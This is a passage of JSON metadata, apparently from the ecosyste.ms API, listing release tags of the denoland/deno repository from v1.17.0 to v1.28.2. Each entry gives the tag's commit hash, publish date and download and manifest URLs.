ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G